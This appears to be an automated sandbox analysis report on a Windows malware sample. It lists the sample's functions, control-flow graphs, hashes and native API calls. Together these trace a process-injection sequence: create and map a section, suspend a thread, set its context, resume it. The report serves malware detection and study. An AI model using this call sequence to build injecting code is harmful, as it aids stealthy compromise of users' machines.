                                                                                              • Instruction Fuzzy Hash: 2911B176504680CFDB15CF10D9C4B56FFB2FB94314F24C6AAD8094B256C33AD95ACBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.6%
                                                                                              Dynamic/Decrypted Code Coverage:2%
                                                                                              Signature Coverage:14.2%
                                                                                              Total number of Nodes:253
                                                                                              Total number of Limit Nodes:26
                                                                                              execution_graph 78656 425543 78657 42555f 78656->78657 78658 425587 78657->78658 78659 42559b 78657->78659 78660 42bf43 NtClose 78658->78660 78666 42bf43 78659->78666 78662 425590 78660->78662 78663 4255a4 78669 42deb3 RtlAllocateHeap 78663->78669 78665 4255af 78667 42bf5d 78666->78667 78668 42bf6a NtClose 78667->78668 78668->78663 78669->78665 78670 42be03 78671 42be27 78670->78671 78673 42be78 78670->78673 78675 40b743 78671->78675 78674 42be71 78677 40b768 78675->78677 78676 40b885 NtReadFile 78678 40b8bc 78676->78678 78677->78676 78678->78674 78679 42b683 78680 42b69d 78679->78680 78683 e9fdc0 LdrInitializeThunk 78680->78683 78681 42b6c1 78683->78681 78878 42ee73 78879 42ee83 78878->78879 78880 42ee89 78878->78880 78883 42de73 78880->78883 78882 42eeaf 78886 42c1f3 78883->78886 78885 42de8e 78885->78882 78887 42c210 78886->78887 78888 42c21d RtlAllocateHeap 78887->78888 78888->78885 78889 42bcd3 78890 42bcf4 78889->78890 78891 42bd4d 78889->78891 78894 40b513 78890->78894 78893 42bd46 78897 40b538 78894->78897 78895 40b655 NtCreateFile 78896 40b694 78895->78896 78896->78893 78897->78895 78898 4258d3 78902 4258e2 78898->78902 78899 425929 78900 42dd93 RtlFreeHeap 78899->78900 78901 425939 78900->78901 78902->78899 78903 425967 78902->78903 78905 42596c 78902->78905 78904 42dd93 RtlFreeHeap 78903->78904 78904->78905 78906 41c1d3 78907 41c217 78906->78907 78912 41c238 78907->78912 78913 42b463 78907->78913 78909 41c244 78910 41c228 78910->78909 78911 42bf43 NtClose 78910->78911 78911->78912 78914 42b487 78913->78914 78916 42b4bc 78913->78916 78918 40a673 78914->78918 78916->78910 78917 42b4b5 78917->78910 78921 40a698 78918->78921 78919 40a7b5 NtSuspendThread 78920 40a7d0 78919->78920 78920->78917 78921->78919 78922 41b6f3 78923 41b765 78922->78923 78924 41b70b 78922->78924 78924->78923 78926 41f2f3 78924->78926 78927 41f319 78926->78927 78930 41f532 78927->78930 78949 42efa3 78927->78949 78929 41f3ab 78929->78930 78931 41f479 78929->78931 78932 42b6d3 LdrInitializeThunk 78929->78932 78930->78923 78942 41f498 78931->78942 78957 419dd3 NtMapViewOfSection 78931->78957 78934 41f407 78932->78934 78934->78931 78936 41f410 78934->78936 78935 41f461 78939 41c253 NtDelayExecution 78935->78939 78936->78930 78936->78935 78937 41f442 78936->78937 78955 419dd3 NtMapViewOfSection 78936->78955 78956 427f83 NtDelayExecution 78937->78956 78938 41f51a 78940 41c253 NtDelayExecution 78938->78940 78944 41f46f 78939->78944 78945 41f528 78940->78945 78942->78938 78946 42b3e3 NtSetContextThread 78942->78946 78944->78923 78945->78923 78947 41f50b 78946->78947 78948 42b4e3 NtResumeThread 78947->78948 78948->78938 78950 42ef13 78949->78950 78951 42ef70 78950->78951 78952 42de73 RtlAllocateHeap 78950->78952 78951->78929 78953 42ef4d 78952->78953 78954 42dd93 RtlFreeHeap 78953->78954 78954->78951 78955->78937 78956->78935 78957->78942 78958 415393 78959 4153ad 78958->78959 78964 418ba3 78959->78964 78961 4153cb 78962 415410 78961->78962 78963 4153ff PostThreadMessageW 78961->78963 78963->78962 78965 418bc7 78964->78965 78966 418c03 LdrLoadDll 78965->78966 78967 418bce 78965->78967 78966->78967 78967->78961 78684 401b24 78685 401b2a 78684->78685 78688 42f333 78685->78688 78691 42d983 78688->78691 78692 42d9a9 78691->78692 78703 4073f3 78692->78703 78694 42d9bf 78702 401c4b 78694->78702 78706 41bfe3 78694->78706 78696 42d9de 78697 42d9f3 78696->78697 78721 42c293 78696->78721 78717 428813 78697->78717 78700 42da02 78701 42c293 ExitProcess 78700->78701 78701->78702 78724 417a63 78703->78724 78705 407400 78705->78694 78707 41c00f 78706->78707 78746 41bed3 78707->78746 78710 41c054 78712 41c070 78710->78712 78715 42bf43 NtClose 78710->78715 78711 41c03c 78713 41c047 78711->78713 78714 42bf43 NtClose 78711->78714 78712->78696 78713->78696 78714->78713 78716 41c066 78715->78716 78716->78696 78718 42886d 78717->78718 78720 42887a 78718->78720 78757 4196f3 78718->78757 78720->78700 78722 42c2b0 78721->78722 78723 42c2c1 ExitProcess 78722->78723 78723->78697 78725 417a7a 78724->78725 78727 417a8f 78725->78727 78728 42c933 78725->78728 78727->78705 78729 42c94b 78728->78729 78730 42c96f 78729->78730 78735 42b6d3 78729->78735 78730->78727 78736 42b6ed 78735->78736 78742 e9fae8 LdrInitializeThunk 78736->78742 78737 42b715 78739 42dd93 78737->78739 78743 42c243 78739->78743 78741 42c9d9 78741->78727 78742->78737 78744 42c260 78743->78744 78745 42c26d RtlFreeHeap 78744->78745 78745->78741 78747 41beed 78746->78747 78751 41bfc9 78746->78751 78752 42b773 78747->78752 78750 42bf43 NtClose 78750->78751 78751->78710 78751->78711 78753 42b78d 78752->78753 78756 ea07ac LdrInitializeThunk 78753->78756 78754 41bfbd 78754->78750 78756->78754 78759 41971d 78757->78759 78758 419b8b 78758->78720 78759->78758 78781 424f13 78759->78781 78761 4197bc 78761->78758 78784 4154c3 78761->78784 78763 41982a 78763->78758 78764 42dd93 RtlFreeHeap 78763->78764 78767 419842 78764->78767 78765 419874 78771 41987b 78765->78771 78794 41c083 78765->78794 78767->78765 78790 406f73 78767->78790 78768 4198b4 78768->78758 78814 42b873 78768->78814 78771->78758 78801 42b3e3 78771->78801 78773 419b1a 78777 419b3d 78773->78777 78819 42b4e3 78773->78819 78774 419931 78774->78773 78806 406fe3 78774->78806 78779 419b5a 78777->78779 78810 41c253 78777->78810 78780 42c293 ExitProcess 78779->78780 78780->78758 78824 42dd03 78781->78824 78783 424f34 78783->78761 78785 4154e2 78784->78785 78788 415529 78784->78788 78786 41c253 NtDelayExecution 78785->78786 78787 415600 78785->78787 78785->78788 78786->78785 78787->78763 78788->78787 78836 414f13 78788->78836 78791 406fa3 78790->78791 78792 41c253 NtDelayExecution 78791->78792 78793 406fc4 78791->78793 78792->78791 78793->78765 78795 41c0a0 78794->78795 78844 42b7c3 78795->78844 78797 41c0f0 78798 41c0f7 78797->78798 78799 42b873 NtMapViewOfSection 78797->78799 78798->78768 78800 41c120 78799->78800 78800->78768 78802 42b43c 78801->78802 78803 42b407 78801->78803 78802->78774 78853 40aa93 78803->78853 78805 42b435 78805->78774 78807 407003 78806->78807 78808 41c253 NtDelayExecution 78807->78808 78809 407023 78807->78809 78808->78807 78809->78773 78811 41c266 78810->78811 78857 42b603 78811->78857 78813 41c291 78813->78777 78815 42b894 78814->78815 78817 42b8e9 78814->78817 78866 40b2e3 78815->78866 78817->78771 78818 42b8e2 78818->78771 78820 42b539 78819->78820 78821 42b504 78819->78821 78820->78777 78870 40aca3 78821->78870 78823 42b532 78823->78777 78827 42c073 78824->78827 78826 42dd34 78826->78783 78828 42c094 78827->78828 78830 42c0d9 78827->78830 78832 40bfd3 78828->78832 78830->78826 78831 42c0d2 78831->78826 78835 40bff8 78832->78835 78833 40c115 NtAllocateVirtualMemory 78834 40c140 78833->78834 78834->78831 78835->78833 78839 42c163 78836->78839 78840 42c17d 78839->78840 78843 e9fb68 LdrInitializeThunk 78840->78843 78841 414f35 78841->78787 78843->78841 78845 42b7e4 78844->78845 78846 42b82d 78844->78846 78849 40b0c3 78845->78849 78846->78797 78848 42b826 78848->78797 78852 40b0e8 78849->78852 78850 40b205 NtCreateSection 78851 40b234 78850->78851 78851->78848 78852->78850 78856 40aab8 78853->78856 78854 40abd5 NtSetContextThread 78855 40abf0 78854->78855 78855->78805 78856->78854 78858 42b627 78857->78858 78859 42b65c 78857->78859 78862 40bbb3 78858->78862 78859->78813 78861 42b655 78861->78813 78863 40bbd8 78862->78863 78864 40bcf5 NtDelayExecution 78863->78864 78865 40bd11 78864->78865 78865->78861 78869 40b308 78866->78869 78867 40b425 NtMapViewOfSection 78868 40b460 78867->78868 78868->78818 78869->78867 78873 40acc8 78870->78873 78871 40ade5 NtResumeThread 78872 40ae00 78871->78872 78872->78823 78873->78871 78968 e9f9f0 LdrInitializeThunk 78874 419d2f 78875 419d33 78874->78875 78876 42bf43 NtClose 78875->78876 78877 419db2 78876->78877

                                                                                              Executed Functions

                                                                                              Function 0040B2E3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186nativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 15 40b2e3-40b347 call 40a113 call 40a123 20 40b425-40b45a NtMapViewOfSection 15->20 21 40b34d-40b392 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 15->21 23 40b460-40b467 20->23 24 40b4f7-40b503 20->24 43 40b39d-40b3a3 21->43 26 40b472-40b478 23->26 27 40b4a0-40b4a4 26->27 28 40b47a-40b49e 26->28 31 40b4e6-40b4f4 call 40a1b3 27->31 32 40b4a6-40b4ad 27->32 28->26 31->24 35 40b4b8-40b4be 32->35 35->31 38 40b4c0-40b4e4 35->38 38->35 44 40b3a5-40b3c9 43->44 45 40b3cb-40b3cf 43->45 44->43 45->20 47 40b3d1-40b3ec 45->47 48 40b3f7-40b3fd 47->48 48->20 49 40b3ff-40b423 48->49 49->48
                                                                                              APIs
                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,4q@,?,?,?,00000000), ref: 0040B44D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: SectionView
                                                                                              • String ID: 4q@$4q@
                                                                                              • API String ID: 1323581903-352822288
                                                                                              • Opcode ID: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                                                                              • Instruction ID: 4f0a1b00017ecff07558768542bc8224e4be8ae8b3833d489124d6a477246c7f
                                                                                              • Opcode Fuzzy Hash: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                                                                              • Instruction Fuzzy Hash: 16711C71E04158DFCB04CFA9C990AEDBBF5AF49304F18816AE859B7341D738AA45CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B513 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 99 40b513-40b577 call 40a113 call 40a123 104 40b655-40b68e NtCreateFile 99->104 105 40b57d-40b5c2 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 99->105 106 40b694-40b69b 104->106 107 40b72b-40b737 104->107 127 40b5cd-40b5d3 105->127 109 40b6a6-40b6ac 106->109 111 40b6d4-40b6d8 109->111 112 40b6ae-40b6d2 109->112 115 40b71a-40b728 call 40a1b3 111->115 116 40b6da-40b6e1 111->116 112->109 115->107 118 40b6ec-40b6f2 116->118 118->115 121 40b6f4-40b718 118->121 121->118 128 40b5d5-40b5f9 127->128 129 40b5fb-40b5ff 127->129 128->127 129->104 131 40b601-40b61c 129->131 132 40b627-40b62d 131->132 132->104 133 40b62f-40b653 132->133 133->132
                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040B681
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                                                                              • Instruction ID: 33bbf8d930d8e7cfe3f019b155e8ea3f1efd11963211b11a84fa3dbb01a3117a
                                                                                              • Opcode Fuzzy Hash: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                                                                              • Instruction Fuzzy Hash: 1C813D71E041589FCB04CFA9C990AEDBBF5AF49304F18816AE459B7341D738A941CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B743 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 135 40b743-40b7a7 call 40a113 call 40a123 140 40b885-40b8b6 NtReadFile 135->140 141 40b7ad-40b7f2 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 135->141 143 40b953-40b95f 140->143 144 40b8bc-40b8c3 140->144 163 40b7fd-40b803 141->163 146 40b8ce-40b8d4 144->146 148 40b8d6-40b8fa 146->148 149 40b8fc-40b900 146->149 148->146 152 40b942-40b950 call 40a1b3 149->152 153 40b902-40b909 149->153 152->143 156 40b914-40b91a 153->156 156->152 157 40b91c-40b940 156->157 157->156 164 40b805-40b829 163->164 165 40b82b-40b82f 163->165 164->163 165->140 167 40b831-40b84c 165->167 168 40b857-40b85d 167->168 168->140 169 40b85f-40b883 168->169 169->168
                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B8A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                                                                              • Instruction ID: d5ca7a445566d5324237c67d8bda7c3d62ebcdba52f65f536e33ce5b52a41de4
                                                                                              • Opcode Fuzzy Hash: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                                                                              • Instruction Fuzzy Hash: 6B713BB1E14158DBCB04CFA9C890AEDBBF5BF49304F18816AE859B7351D338A945CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B0C3 Relevance: 1.7, APIs: 1, Instructions: 180nativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 171 40b0c3-40b0e2 172 40b0e8-40b127 call 40a123 171->172 173 40b0e3 call 40a113 171->173 176 40b205-40b22e NtCreateSection 172->176 177 40b12d-40b172 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 172->177 173->172 178 40b234-40b23b 176->178 179 40b2cb-40b2d7 176->179 199 40b17d-40b183 177->199 182 40b246-40b24c 178->182 184 40b274-40b278 182->184 185 40b24e-40b272 182->185 188 40b2ba-40b2c8 call 40a1b3 184->188 189 40b27a-40b281 184->189 185->182 188->179 191 40b28c-40b292 189->191 191->188 194 40b294-40b2b8 191->194 194->191 200 40b185-40b1a9 199->200 201 40b1ab-40b1af 199->201 200->199 201->176 203 40b1b1-40b1cc 201->203 204 40b1d7-40b1dd 203->204 204->176 205 40b1df-40b203 204->205 205->204
                                                                                              APIs
                                                                                              • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,004070F1,00000000,?,?,08000000), ref: 0040B221
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateSection
                                                                                              • String ID:
                                                                                              • API String ID: 2449625523-0
                                                                                              • Opcode ID: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                                                                              • Instruction ID: 01317c8874684397ccd25c89dd95e7ea8e4a3edbd884f59941ddaf063ff58e3a
                                                                                              • Opcode Fuzzy Hash: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                                                                              • Instruction Fuzzy Hash: CD712C71D14158DFCB05CFA9C890AEDBBB1BF49304F1881AAE859B7341D738A946CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040BFD3 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 207 40bfd3-40c037 call 40a113 call 40a123 212 40c115-40c13a NtAllocateVirtualMemory 207->212 213 40c03d-40c082 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 207->213 214 40c140-40c147 212->214 215 40c1d7-40c1e3 212->215 235 40c08d-40c093 213->235 217 40c152-40c158 214->217 219 40c180-40c184 217->219 220 40c15a-40c17e 217->220 224 40c1c6-40c1d4 call 40a1b3 219->224 225 40c186-40c18d 219->225 220->217 224->215 226 40c198-40c19e 225->226 226->224 230 40c1a0-40c1c4 226->230 230->226 236 40c095-40c0b9 235->236 237 40c0bb-40c0bf 235->237 236->235 237->212 238 40c0c1-40c0dc 237->238 240 40c0e7-40c0ed 238->240 240->212 241 40c0ef-40c113 240->241 241->240
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040C12D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                                                                              • Instruction ID: 8143565c1ed0993058e6d586fa4036d4e587653beb669d54d7f95b9336940cd5
                                                                                              • Opcode Fuzzy Hash: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                                                                              • Instruction Fuzzy Hash: 62712F71E04158DFCB04CFA9C890AEDBBF1BF49304F18816AE859BB341D638A946CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AA93 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 279 40aa93-40aaf7 call 40a113 call 40a123 284 40abd5-40abea NtSetContextThread 279->284 285 40aafd-40ab42 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 279->285 287 40abf0-40abf7 284->287 288 40ac87-40ac93 284->288 307 40ab4d-40ab53 285->307 290 40ac02-40ac08 287->290 292 40ac30-40ac34 290->292 293 40ac0a-40ac2e 290->293 296 40ac76-40ac84 call 40a1b3 292->296 297 40ac36-40ac3d 292->297 293->290 296->288 300 40ac48-40ac4e 297->300 300->296 301 40ac50-40ac74 300->301 301->300 308 40ab55-40ab79 307->308 309 40ab7b-40ab7f 307->309 308->307 309->284 311 40ab81-40ab9c 309->311 312 40aba7-40abad 311->312 312->284 313 40abaf-40abd3 312->313 313->312
                                                                                              APIs
                                                                                              • NtSetContextThread.NTDLL(?,?), ref: 0040ABDD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                                                                              • Instruction ID: d4e5869915a99125bcdad7944eea00a2bf72dfbca1512e106d76b181c7b9fddb
                                                                                              • Opcode Fuzzy Hash: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                                                                              • Instruction Fuzzy Hash: DC718F71E04258DFCB04CFA9C490AEDBBF2BF49304F18806AE419BB341D638A956DF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040BBB3 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 351 40bbb3-40bbd2 352 40bbd8-40bc17 call 40a123 351->352 353 40bbd3 call 40a113 351->353 356 40bcf5-40bd0b NtDelayExecution 352->356 357 40bc1d-40bc62 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 352->357 353->352 358 40bd11-40bd18 356->358 359 40bda8-40bdb4 356->359 379 40bc6d-40bc73 357->379 361 40bd23-40bd29 358->361 363 40bd51-40bd55 361->363 364 40bd2b-40bd4f 361->364 366 40bd97-40bda5 call 40a1b3 363->366 367 40bd57-40bd5e 363->367 364->361 366->359 370 40bd69-40bd6f 367->370 370->366 373 40bd71-40bd95 370->373 373->370 380 40bc75-40bc99 379->380 381 40bc9b-40bc9f 379->381 380->379 381->356 383 40bca1-40bcbc 381->383 384 40bcc7-40bccd 383->384 384->356 385 40bccf-40bcf3 384->385 385->384
                                                                                              APIs
                                                                                              • NtDelayExecution.NTDLL(0041C291,?,?,?,00000000), ref: 0040BCFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DelayExecution
                                                                                              • String ID:
                                                                                              • API String ID: 1249177460-0
                                                                                              • Opcode ID: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                                                                              • Instruction ID: 224df048350992204dea636a9cf2136097186a6e34023e583b2a4fcadb8b91eb
                                                                                              • Opcode Fuzzy Hash: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                                                                              • Instruction Fuzzy Hash: CC712E71E04258DFCB05CFA9C490AEDBBF1AF49304F1880AAE855B7341D738AA45DF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040ACA3 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 315 40aca3-40acc2 316 40acc8-40ad07 call 40a123 315->316 317 40acc3 call 40a113 315->317 320 40ade5-40adfa NtResumeThread 316->320 321 40ad0d-40ad52 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 316->321 317->316 323 40ae00-40ae07 320->323 324 40ae97-40aea3 320->324 343 40ad5d-40ad63 321->343 326 40ae12-40ae18 323->326 328 40ae40-40ae44 326->328 329 40ae1a-40ae3e 326->329 332 40ae86-40ae94 call 40a1b3 328->332 333 40ae46-40ae4d 328->333 329->326 332->324 334 40ae58-40ae5e 333->334 334->332 337 40ae60-40ae84 334->337 337->334 344 40ad65-40ad89 343->344 345 40ad8b-40ad8f 343->345 344->343 345->320 347 40ad91-40adac 345->347 348 40adb7-40adbd 347->348 348->320 349 40adbf-40ade3 348->349 349->348
                                                                                              APIs
                                                                                              • NtResumeThread.NTDLL(004071D5,?,?,?,?), ref: 0040ADED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                                                                              • Instruction ID: b6f10511c00207d67f0fbc32bcefce55cc479fdc692c5c7557564370438ddd56
                                                                                              • Opcode Fuzzy Hash: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                                                                              • Instruction Fuzzy Hash: D3715F71E04258DFCB04CFA9C890AEDBBF2BF49304F18806AE859B7341D638A955CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A673 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 243 40a673-40a6d7 call 40a113 call 40a123 248 40a7b5-40a7ca NtSuspendThread 243->248 249 40a6dd-40a722 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 243->249 251 40a7d0-40a7d7 248->251 252 40a867-40a873 248->252 271 40a72d-40a733 249->271 254 40a7e2-40a7e8 251->254 256 40a810-40a814 254->256 257 40a7ea-40a80e 254->257 260 40a856-40a864 call 40a1b3 256->260 261 40a816-40a81d 256->261 257->254 260->252 264 40a828-40a82e 261->264 264->260 267 40a830-40a854 264->267 267->264 272 40a735-40a759 271->272 273 40a75b-40a75f 271->273 272->271 273->248 274 40a761-40a77c 273->274 276 40a787-40a78d 274->276 276->248 277 40a78f-40a7b3 276->277 277->276
                                                                                              APIs
                                                                                              • NtSuspendThread.NTDLL(?,?), ref: 0040A7BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: SuspendThread
                                                                                              • String ID:
                                                                                              • API String ID: 3178671153-0
                                                                                              • Opcode ID: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                                                                              • Instruction ID: e0512f439ae47d9be5cbe886a187579ca4bcb7003b3baa994f3caa2f25e50319
                                                                                              • Opcode Fuzzy Hash: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                                                                              • Instruction Fuzzy Hash: 95714F75E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7341D638A956CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00418BA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C15
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                                                                              • Instruction ID: 3a7d3c80330e5758b3a9f81f32ca88ff767ca5b188dc6faacfe14b01834f0b54
                                                                                              • Opcode Fuzzy Hash: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                                                                              • Instruction Fuzzy Hash: 470152B5E0010DB7DB10DAE5DD42FDEB7789B54308F0081AAE90897240F635EB588795
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042BF43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                                                                              • Instruction ID: d89d2c0c652fac5e8b7a6d34093b53a94ebb12e8b588f04006b5246e933adf9e
                                                                                              • Opcode Fuzzy Hash: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
